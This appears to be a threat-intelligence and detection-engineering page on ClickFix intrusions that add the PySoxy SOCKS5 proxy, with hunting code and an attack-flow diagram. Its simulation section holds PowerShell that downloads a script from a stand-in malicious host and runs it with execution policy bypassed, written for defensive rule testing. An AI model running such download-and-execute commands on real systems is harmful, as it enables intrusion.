SOC Prime Bias: Critical

14 May 2026 12:37 UTC

ClickFix Evolves with PySoxy Proxying


Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Summary

ClickFix is a social engineering-based delivery technique that is now being paired with the open-source PySoxy SOCKS5 proxy to create an encrypted secondary access channel. The intrusion begins when a user executes a malicious PowerShell command, which sets up scheduled-task persistence and launches an in-memory PowerShell command-and-control session. After initial reconnaissance, the attacker downloads and runs PySoxy to establish a second encrypted path into the environment. This modular use of interpreter-based tools makes both detection and incident containment more challenging.

Investigation

ReliaQuest observed a single user-driven ClickFix command that launched an obfuscated PowerShell stager, created a scheduled task, performed domain reconnaissance, and later downloaded a compiled Python bytecode file named b64.pyc, which was executed with python.exe. The PowerShell component acted as a lightweight RAT, polling its command-and-control server every three seconds. Researchers also saw the attacker use curl to upload logs and retrieve the PySoxy payload from the same staging server.
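The three-second polling loop described above is a property defenders can hunt for in egress telemetry even when the destination is not yet on a blocklist. The following is an added example (not ReliaQuest's or SOC Prime's code): it groups constructed firewall/proxy log lines by source host and destination, measures the inter-arrival intervals, and flags flows whose interval is short and almost jitter-free. The log format, host name and destinations are constructed for illustration; only the three-second cadence comes from the write-up.

```python
"""Periodic-beacon check over constructed egress log lines.

Added example, not part of the original page. Log format, host names and
destination names are constructed; the 3 s polling interval is from the text.
"""
from collections import defaultdict
from datetime import datetime
from statistics import median

# Constructed egress log: "<ISO timestamp> <src_host> <dst> <bytes>".
# The staging destination polls every 3 s (the RAT loop); the update host
# is irregular background traffic and should not be flagged.
SAMPLE_LOG = """\
2026-05-14T12:00:00 WS-017 staging.example.invalid:443 312
2026-05-14T12:00:03 WS-017 staging.example.invalid:443 305
2026-05-14T12:00:06 WS-017 staging.example.invalid:443 318
2026-05-14T12:00:09 WS-017 staging.example.invalid:443 301
2026-05-14T12:00:12 WS-017 staging.example.invalid:443 310
2026-05-14T12:00:15 WS-017 staging.example.invalid:443 307
2026-05-14T12:00:01 WS-017 updates.example.invalid:443 4096
2026-05-14T12:07:44 WS-017 updates.example.invalid:443 2048
2026-05-14T12:31:02 WS-017 updates.example.invalid:443 8192
2026-05-14T12:33:10 WS-017 updates.example.invalid:443 512
"""


def parse_log(text):
    """Group timestamps by (source host, destination)."""
    flows = defaultdict(list)
    for line in text.splitlines():
        ts, host, dst, _size = line.split()
        flows[(host, dst)].append(datetime.fromisoformat(ts))
    return flows


def beacon_score(timestamps, min_events=5):
    """Return (median_interval_s, jitter_ratio), or None with too few events.

    jitter_ratio = median absolute deviation of the gaps / median gap.
    A tight poll loop has a jitter ratio near zero; human-driven or
    scheduler-driven traffic does not.
    """
    ts = sorted(timestamps)
    if len(ts) < min_events:
        return None
    gaps = [(b - a).total_seconds() for a, b in zip(ts, ts[1:])]
    med = median(gaps)
    if med == 0:
        return None
    mad = median(abs(g - med) for g in gaps)
    return med, mad / med


def find_beacons(text, max_interval=60.0, max_jitter=0.2, min_events=5):
    """Return the flows that look like short-interval, low-jitter beacons."""
    hits = []
    for (host, dst), stamps in parse_log(text).items():
        score = beacon_score(stamps, min_events)
        if score is None:
            continue
        med, jitter = score
        if med <= max_interval and jitter <= max_jitter:
            hits.append({"host": host, "dst": dst,
                         "interval_s": med, "jitter": jitter})
    return hits


if __name__ == "__main__":
    for hit in find_beacons(SAMPLE_LOG):
        print(f"{hit['host']} -> {hit['dst']}: every {hit['interval_s']:.1f}s "
              f"(jitter {hit['jitter']:.2f})")
```

The thresholds (`max_interval`, `max_jitter`, `min_events`) are tuning knobs: a 60-second ceiling catches the aggressive loop seen here, while a longer window would be needed for slower beacons, at the cost of more legitimate keep-alive traffic landing in the result set.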

Mitigation

Defenders should detect and block suspicious PowerShell launches originating from explorer.exe, monitor for scheduled tasks that execute hidden PowerShell commands, and hunt for Python executions using proxy-related arguments such as -ssl, -remote_ip, and -remote_port. Security teams should also inspect outbound traffic to the identified domains and IP addresses and remove any persisted PowerShell scripts or .pyc files found in ProgramData.
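The three hunting criteria above (PowerShell spawned by explorer.exe with bypass flags, scheduled tasks that launch hidden PowerShell, and python.exe carrying proxy arguments or a .pyc from ProgramData) translate directly into process-creation triage logic. The following is an added example, not SOC Prime's detection content or ReliaQuest's: it applies those criteria to constructed Sysmon-style events. The field names (`Image`, `ParentImage`, `CommandLine`), the sample paths and the TEST-NET address are assumptions; the `-w hidden` and `-enc` flag patterns are added alongside the `-NoProfile` / `-ExecutionPolicy Bypass` pair the page itself uses.

```python
"""Process-creation triage for the ClickFix/PySoxy tradecraft described above.

Added example, not part of the original page. Event field names follow the
Sysmon event 1 convention (assumed); all sample events are constructed.
"""
import re

PS_IMAGES = ("powershell.exe", "pwsh.exe")

# Launch flags worth flagging. -NoProfile/-ExecutionPolicy Bypass come from the
# page's simulation; -w hidden and -enc are added as assumptions.
PS_SUSPECT_FLAGS = re.compile(
    r"-(?:nop(?:rofile)?|ep\s+bypass|executionpolicy\s+bypass"
    r"|w(?:indowstyle)?\s+hidden|enc(?:odedcommand)?)\b", re.I)

# Proxy-style arguments named in the Mitigation section.
PROXY_ARGS = re.compile(r"-(?:ssl|remote_ip|remote_port)\b", re.I)

# Compiled Python bytecode staged under ProgramData (b64.pyc in the report).
PYC_IN_PROGRAMDATA = re.compile(r"\\ProgramData\\[^\s\"]*\.pyc\b", re.I)


def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def triage(event):
    """Return the rule names the event matches (empty list if nothing fires)."""
    image = basename(event.get("Image", ""))
    parent = basename(event.get("ParentImage", ""))
    cmd = event.get("CommandLine", "")
    hits = []
    # ClickFix: the user pastes the command into the Run dialog, so the
    # shell's parent is explorer.exe rather than a terminal or an installer.
    if image in PS_IMAGES and parent == "explorer.exe" and PS_SUSPECT_FLAGS.search(cmd):
        hits.append("ps_from_explorer_bypass")
    # Persistence: a task whose action is a hidden/bypass PowerShell launch.
    if image == "schtasks.exe" and "/create" in cmd.lower() and PS_SUSPECT_FLAGS.search(cmd):
        hits.append("schtask_hidden_powershell")
    # PySoxy stage: python.exe with proxy arguments or a .pyc under ProgramData.
    if image in ("python.exe", "pythonw.exe") and (
            PROXY_ARGS.search(cmd) or PYC_IN_PROGRAMDATA.search(cmd)):
        hits.append("python_proxy_or_pyc")
    return hits


# Constructed events: three that mirror the intrusion, two benign controls.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"powershell.exe -NoProfile -ExecutionPolicy Bypass "
                    r"-File C:\Users\alice\AppData\Local\Temp\payload.ps1"},
    {"Image": r"C:\Windows\System32\schtasks.exe",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'schtasks.exe /create /tn "OneDriveSync" '
                    r'/tr "powershell.exe -w hidden -ep bypass -File C:\ProgramData\sync.ps1" '
                    r"/sc minute /mo 5"},
    {"Image": r"C:\Python312\python.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"python.exe C:\ProgramData\b64.pyc "
                    r"-remote_ip 203.0.113.10 -remote_port 1080 -ssl"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell.exe"},
    {"Image": r"C:\Python312\python.exe",
     "ParentImage": r"C:\Users\alice\AppData\Local\Programs\Microsoft VS Code\Code.exe",
     "CommandLine": "python.exe -m pytest tests"},
]


def review(events=SAMPLE_EVENTS):
    """Return (image, rules) for every event that fires at least one rule."""
    return [(basename(e["Image"]), triage(e)) for e in events if triage(e)]


if __name__ == "__main__":
    for image, rules in review():
        print(f"{image}: {', '.join(rules)}")
```

The parent-process condition is what keeps the first rule quiet in an environment where administrators legitimately run `-ExecutionPolicy Bypass` from a terminal; tune the flag list and the image set against your own baseline before promoting this from a hunt query to an alert.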

Response

If related indicators are found, isolate the affected host immediately, disable the compromised user account, remove the malicious scheduled task, delete the PowerShell script and PySoxy artifacts, and scan the system for additional remnants. Defenders should also confirm that outbound traffic to the identified infrastructure is blocked and verify that no other persistence mechanisms remain active.

Attack Flow

    graph TB
      %% Class definitions
      classDef technique fill:#cce5ff
      %% Node definitions
      tech_content_injection["<b>Technique</b> – <b>T1659 Content Injection</b><br/><b>Description</b>: Adversaries inject malicious content into legitimate files or data streams to enable further malicious actions."]
      class tech_content_injection technique
      tech_user_exec_malicious_link["<b>Technique</b> – <b>T1204.001 User Execution: Malicious Link</b><br/><b>Description</b>: Victim clicks a crafted link that launches malicious code."]
      class tech_user_exec_malicious_link technique
      tech_user_exec_psh_stager["<b>Technique</b> – <b>T1204 User Execution (PowerShell stager)</b><br/><b>Description</b>: User runs a PowerShell command that stages additional payloads."]
      class tech_user_exec_psh_stager technique
      tech_obf_embedded_payloads["<b>Technique</b> – <b>T1027.009 Obfuscated Files or Information: Embedded Payloads</b><br/><b>Description</b>: Payloads are hidden or encrypted within other files to evade detection."]
      class tech_obf_embedded_payloads technique
      tech_reflective_loading["<b>Technique</b> – <b>T1620 Reflective Code Loading</b><br/><b>Description</b>: Malicious code is loaded directly into memory using reflective techniques."]
      class tech_reflective_loading technique
      tech_scheduled_task["<b>Technique</b> – <b>T1053 Scheduled Task/Job</b><br/><b>Description</b>: A scheduled task or job is created to execute malicious code for persistence."]
      class tech_scheduled_task technique
      tech_user_exec_psh_rat["<b>Technique</b> – <b>T1204 User Execution (in-memory PowerShell RAT)</b><br/><b>Description</b>: User inadvertently runs an in-memory PowerShell based remote access tool."]
      class tech_user_exec_psh_rat technique
      tech_permission_groups["<b>Technique</b> – <b>T1069 Permission Groups Discovery</b><br/><b>Description</b>: Adversary enumerates permission groups and memberships on the system."]
      class tech_permission_groups technique
      tech_lateral_tool_transfer["<b>Technique</b> – <b>T1570 Lateral Tool Transfer</b><br/><b>Description</b>: Tools or files are transferred laterally to another host, e.g., via curl upload."]
      class tech_lateral_tool_transfer technique
      tech_multistage_channels["<b>Technique</b> – <b>T1104 Multi-Stage Channels</b><br/><b>Description</b>: Additional communication channel is established to download further payloads such as PySoxy."]
      class tech_multistage_channels technique
      tech_proxy["<b>Technique</b> – <b>T1090 Proxy</b><br/><b>Description</b>: Traffic is relayed through a proxy server to hide origin."]
      class tech_proxy technique
      tech_proxy_external["<b>Technique</b> – <b>T1090.002 Proxy: External Proxy</b><br/><b>Description</b>: An external proxy service is used to further conceal command-and-control traffic."]
      class tech_proxy_external technique
      tech_exfil_alt_proto["<b>Technique</b> – <b>T1048 Exfiltration Over Alternative Protocol</b><br/><b>Description</b>: Data is exfiltrated using a protocol not typically associated with data transfer."]
      class tech_exfil_alt_proto technique
      %% Connections showing attack flow
      tech_content_injection -->|leads_to| tech_user_exec_malicious_link
      tech_user_exec_malicious_link -->|leads_to| tech_user_exec_psh_stager
      tech_user_exec_psh_stager -->|leads_to| tech_obf_embedded_payloads
      tech_obf_embedded_payloads -->|leads_to| tech_reflective_loading
      tech_user_exec_psh_stager -->|enables| tech_scheduled_task
      tech_scheduled_task -->|leads_to| tech_user_exec_psh_rat
      tech_user_exec_psh_rat -->|leads_to| tech_permission_groups
      tech_permission_groups -->|leads_to| tech_lateral_tool_transfer
      tech_lateral_tool_transfer -->|leads_to| tech_multistage_channels
      tech_multistage_channels -->|leads_to| tech_proxy
      tech_proxy -->|leads_to| tech_proxy_external
      tech_proxy_external -->|leads_to| tech_exfil_alt_proto

Simulation Execution

Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.

Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic.

  • Attack Narrative & Commands:

    1. Goal: Establish a PowerShell‑based C2 channel (ClickFix) that downloads a malicious payload from a remote server and executes it stealthily.
    2. Method: The attacker launches powershell.exe with the exact flag set the rule monitors (-NoProfile and -ExecutionPolicy Bypass) and uses Invoke-WebRequest to fetch the payload.
    3. Why this method: By using native Windows PowerShell and the common Invoke-WebRequest cmdlet, the adversary avoids downloading third‑party tools, reducing the chance of AV detection while matching the known ClickFix behavior captured in the rule.
    # Step 1: Download the malicious script (simulated as a benign test file)
    $url = "http://malicious.example.com/payload.ps1"
    $out = "$env:TEMP\payload.ps1"   # path separator restored; "$env:TEMPpayload.ps1" would not expand
    Invoke-WebRequest -Uri $url -OutFile $out
    
    # Step 2: Execute the downloaded script using the same launch parameters the rule watches
    powershell.exe -NoProfile -ExecutionPolicy Bypass -File $out
  • Regression Test Script:

    # ==============================================
    # ClickFix PowerShell C2 Simulation (TC-20260514-3G7ZK)
    # ==============================================
    
    # Define variables
    $url = "http://malicious.example.com/payload.ps1"
    $out = "$env:TEMP\payload.ps1"   # temp-directory path; the separator was missing in the original
    
    # 1. Download a dummy payload (acts as the C2 fetch)
    Write-Host "[*] Downloading payload..."
    try {
        Invoke-WebRequest -Uri $url -OutFile $out -UseBasicParsing
    } catch {
        Write-Error "Download failed: $_"
        exit 1
    }
    
    # 2. Execute the payload with the exact flags monitored by the rule
    Write-Host "[*] Executing payload with -NoProfile -ExecutionPolicy Bypass"
    powershell.exe -NoProfile -ExecutionPolicy Bypass -File $out
    
    Write-Host "[+] Simulation complete."
    # ==============================================
  • Cleanup Commands:

    # Recreate the path used by the simulation so the cleanup also works on its own
    $out = "$env:TEMP\payload.ps1"
    
    # Remove the temporary payload file
    if (Test-Path $out) {
        Remove-Item -Path $out -Force
        Write-Host "[*] Payload file removed."
    }
    
    # Optionally stop any lingering PowerShell processes launched by the test
    # (skip the current session so the cleanup does not terminate itself)
    Get-Process -Name "powershell" -ErrorAction SilentlyContinue |
        Where-Object { $_.Id -ne $PID -and $_.Path -like "*powershell.exe" } |
        Stop-Process -Force
    Write-Host "[*] Cleanup finished."